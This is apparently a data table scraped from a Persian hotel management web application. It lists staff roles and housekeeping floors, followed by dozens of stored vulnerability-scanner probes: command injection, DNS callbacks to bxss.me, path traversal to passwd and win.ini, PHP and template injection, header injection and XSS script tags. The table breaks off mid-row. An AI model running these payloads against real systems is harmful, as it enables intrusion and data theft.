|
1
|
ادمین
|
-
|
-
|
|
|
2
|
رستوران
|
-
|
-
|
|
|
3
|
فروشگاه
|
-
|
-
|
|
|
4
|
کافی شاپ
|
-
|
-
|
|
|
5
|
خانه داری طبقه اول
|
101 - 115
|
-
|
|
|
6
|
خانه داری طبقه دوم
|
201 - 215
|
-
|
|
|
7
|
پذیرش
|
-
|
-
|
|
|
8
|
میهمان
|
-
|
-
|
|
|
9
|
خانه داری طبقه سوم
|
301 - 315
|
-
|
|
|
10
|
خانه داری طبقه چهارم
|
401 - 415
|
-
|
|
|
11
|
خانه داری طبقه پنجم
|
501 - 515
|
-
|
|
|
12
|
خانه داری طبقه ششم
|
601 - 615
|
-
|
|
|
13
|
مدیر خانه داری
|
101 - 615
|
-
|
|
|
14
|
1YFFeRtYO
|
-
|
-
|
|
|
15
|
response.write(9095678*9212283)
|
-
|
-
|
|
|
16
|
'+response.write(9095678*9212283)+'
|
-
|
-
|
|
|
17
|
"+response.write(9095678*9212283)+"
|
-
|
-
|
|
|
18
|
/../../../../../../../../../../windows/system32/BITSADMIN.exe
|
-
|
-
|
|
|
19
|
Dg66ebrE
|
-
|
-
|
|
|
20
|
echo ygbbud$()\ vtwhnu\nz^xyu||a #' &echo ygbbud$()\ vtwhnu\nz^xyu||a #|" &echo ygbbud$()\ vtwhnu\nz^xyu||a #
|
-
|
-
|
|
|
21
|
&echo deofie$()\ zwgrhc\nz^xyu||a #' &echo deofie$()\ zwgrhc\nz^xyu||a #|" &echo deofie$()\ zwgrhc\nz^xyu||a #
|
-
|
-
|
|
|
22
|
../../../../../../../../../../../../../../etc/passwd
|
-
|
-
|
|
|
23
|
|echo smnwkf$()\ oesxib\nz^xyu||a #' |echo smnwkf$()\ oesxib\nz^xyu||a #|" |echo smnwkf$()\ oesxib\nz^xyu||a #
|
-
|
-
|
|
|
24
|
../../../../../../../../../../../../../../windows/win.ini
|
-
|
-
|
|
|
25
|
%0abcc:009247.1400-11318.1400.785ae.20235.2@bxss.me
|
-
|
-
|
|
|
26
|
(nslookup hitflldnyqdyx12b5e.bxss.me||perl -e "gethostbyname('hitflldnyqdyx12b5e.bxss.me')")
|
-
|
-
|
|
|
27
|
C:\WINDOWS\system32\drivers\etc\hosts
|
-
|
-
|
|
|
28
|
to@example.com>%0d%0abcc:009247.1400-11319.1400.785ae.20235.2@bxss.me
|
-
|
-
|
|
|
29
|
$(nslookup hitosljmuwhmff6698.bxss.me||perl -e "gethostbyname('hitosljmuwhmff6698.bxss.me')")
|
-
|
-
|
|
|
30
|
../../../../../../../../../../windows/win.ini%00.jpg
|
-
|
-
|
|
|
31
|
&(nslookup hitcoitjudagi9ed81.bxss.me||perl -e "gethostbyname('hitcoitjudagi9ed81.bxss.me')")&'\"`0&(nslookup hitcoitjudagi9ed81.bxss.me||perl -e "gethostbyname('hitcoitjudagi9ed81.bxss.me')")&`'
|
-
|
-
|
|
|
32
|
/../../../../../../../../../../boot.ini
|
-
|
-
|
|
|
33
|
|(nslookup hitxyxrulftwr6b689.bxss.me||perl -e "gethostbyname('hitxyxrulftwr6b689.bxss.me')")
|
-
|
-
|
|
|
34
|
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
|
-
|
-
|
|
|
35
|
`(nslookup hituwnekfqxvr2e689.bxss.me||perl -e "gethostbyname('hituwnekfqxvr2e689.bxss.me')")`
|
-
|
-
|
|
|
36
|
..\..\..\..\..\..\..\..\windows\win.ini
|
-
|
-
|
|
|
37
|
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
|
-
|
-
|
|
|
38
|
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
|
-
|
-
|
|
|
39
|
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
|
-
|
-
|
|
|
40
|
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
|
-
|
-
|
|
|
41
|
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
|
-
|
-
|
|
|
42
|
WEB-INF/web.xml
|
-
|
-
|
|
|
43
|
WEB-INF\web.xml
|
-
|
-
|
|
|
44
|
<esi:include src="http://bxss.me/rpb.png"/>
|
-
|
-
|
|
|
45
|
${9999040+9999620}
|
-
|
-
|
|
|
46
|
&n972740=v983630
|
-
|
-
|
|
|
47
|
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
|
-
|
-
|
|
|
48
|
1some_inexistent_file_with_long_name%00.jpg
|
-
|
-
|
|
|
49
|
Http://bxss.me/t/fit.txt
|
-
|
-
|
|
|
50
|
http://bxss.me/t/fit.txt%3F.jpg
|
-
|
-
|
|
|
51
|
/etc/shells
|
-
|
-
|
|
|
52
|
)
|
-
|
-
|
|
|
53
|
c:/windows/win.ini
|
-
|
-
|
|
|
54
|
!(()&&!|*|*|
|
-
|
-
|
|
|
55
|
bxss.me
|
-
|
-
|
|
|
56
|
^(#$!@#$)(()))******
|
-
|
-
|
|
|
57
|
'.gethostbyname(lc('hitoe'.'jarbgnga753b2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(68).chr(116).chr(85).'
|
-
|
-
|
|
|
58
|
".gethostbyname(lc("hitqh"."wpybqpsu71df9.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(70).chr(112).chr(89)."
|
-
|
-
|
|
|
59
|
HttP://bxss.me/t/xss.html?%00
|
-
|
-
|
|
|
60
|
bxss.me/t/xss.html?%00
|
-
|
-
|
|
|
61
|
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
|
-
|
-
|
|
|
62
|
';print(md5(31337));$a='
|
-
|
-
|
|
|
63
|
"+"A".concat(70-3).concat(22*4).concat(112).concat(69).concat(99).concat(90)+(require"socket"
Socket.gethostbyname("hitkr"+"htnbeakl340dc.bxss.me.")[3].to_s)+"
|
-
|
-
|
|
|
64
|
";print(md5(31337));$a="
|
-
|
-
|
|
|
65
|
'+'A'.concat(70-3).concat(22*4).concat(117).concat(90).concat(102).concat(70)+(require'socket'
Socket.gethostbyname('hitou'+'jfqymzcb35095.bxss.me.')[3].to_s)+'
|
-
|
-
|
|
|
66
|
${@print(md5(31337))}
|
-
|
-
|
|
|
67
|
${@print(md5(31337))}\
|
-
|
-
|
|
|
68
|
'.print(md5(31337)).'
|
-
|
-
|
|
|
69
|
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
|
-
|
-
|
|
|
70
|
/xfs.bxss.me
|
-
|
-
|
|
|
71
|
'"
|
-
|
-
|
|
|
72
|
<!--
|
-
|
-
|
|
|
73
|
1'"()&%<acx><ScRiPt >K2VE(9415)</ScRiPt>
|
-
|
-
|
|
|
74
|
'"()&%<acx><ScRiPt >K2VE(9222)</ScRiPt>
|
-
|
-
|
|
|
75
|
19775372
|
-
|
-
|
|
|
76
|
acu10690%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10690
|
-
|
-
|
|
|
77
|
acux1673%C0%BEz1%C0%BCz2a%90bcxuca1673
|
-
|
-
|
|
|
78
|
<%={{={@{#{${acx}}%>
|
-
|
-
|
|
|
79
|
<th:t="${acx}#foreach
|
-
|
-
|
|
|
80
|
1
|
-
|
-
|
|
|
81
|
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
|
-
|
-
|
|
|
82
|
acx{{98991*97996}}xca
|
-
|
-
|
|
|
83
|
acx[[${98991*97996}]]xca
|
-
|
-
|
|
|
84
|
acx__${98991*97996}__::.x
|
-
|
-
|
|
|
85
|
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
|
-
|
-
|
|
|
86
|
1<ScRiPt >K2VE(9979)</ScRiPt>
|
-
|
-
|
|
|
87
|
1<WUG5AU>AZXKF[!+!]</WUG5AU>
|
-
|
-
|
|
|
88
|
1<script>K2VE(9499)</script>
|
-
|
-
|
|
|
89
|
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4B%32%56%45%28%39%36%32%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
|
-
|
-
|
|
|
90
|
1<ScRiPt
>K2VE(9503)</ScRiPt>
|
-
|
-
|
|
|
91
|
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9545></ScRiPt>
|
-
|
-
|
|
|
92
|
1< |